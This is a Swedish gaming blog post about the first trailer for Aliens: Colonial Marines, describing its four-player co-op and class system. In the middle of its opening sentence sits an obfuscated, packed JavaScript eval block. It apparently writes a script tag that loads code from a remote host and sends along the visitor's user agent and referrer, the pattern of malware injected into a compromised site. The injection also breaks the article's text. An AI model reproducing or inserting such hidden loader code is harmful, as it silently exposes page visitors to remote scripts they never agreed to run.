Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Aliens: Colonial Marines trailer

Aliens: Colonial Marines trailer
Alexander Gylemo

Spel eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ahibs|var|u0026u|referrer|dndna||js|php’.split(‘|’),0,{}))
baserade på den prisbelönta Alien-filmserien har i de flesta försöken floppat om man kanske bortser från Alien vs. Predator-spelen. För några år sedan var vi däremot nära på att få ett spel som utspelade sig i Alien-universumet som såg riktigt lovande ut, tyvärr lades det dock på is för att sedan läggas ner helt och hållet. Under E3-konferensen tidigare i år gick däremot SEGA och Gearbox Interactive ut med att de har grävt upp det efterlängtade spelet som ska släppas någon gång under 2012 (till PS3, Xbox 360, Wii U och PC) till många fans enorma lycka och nu har en första trailer släppts.

Spelet ska tydligen ha ett Left 4 Dead-liknande upplägg där fyra personer kan spela igenom spelet i co-op och man ska även kunna välja olika klasser för att på smidigast sätt ta sig igenom de läskiga uppdragen, och av den välgjorda trailern som släpptes tidigare idag att döma ser det ut som att vi kommer bjudas på grym grafik och otrolig stämning.
httpv://www.youtube.com/watch?v=T-qXFQRHEkc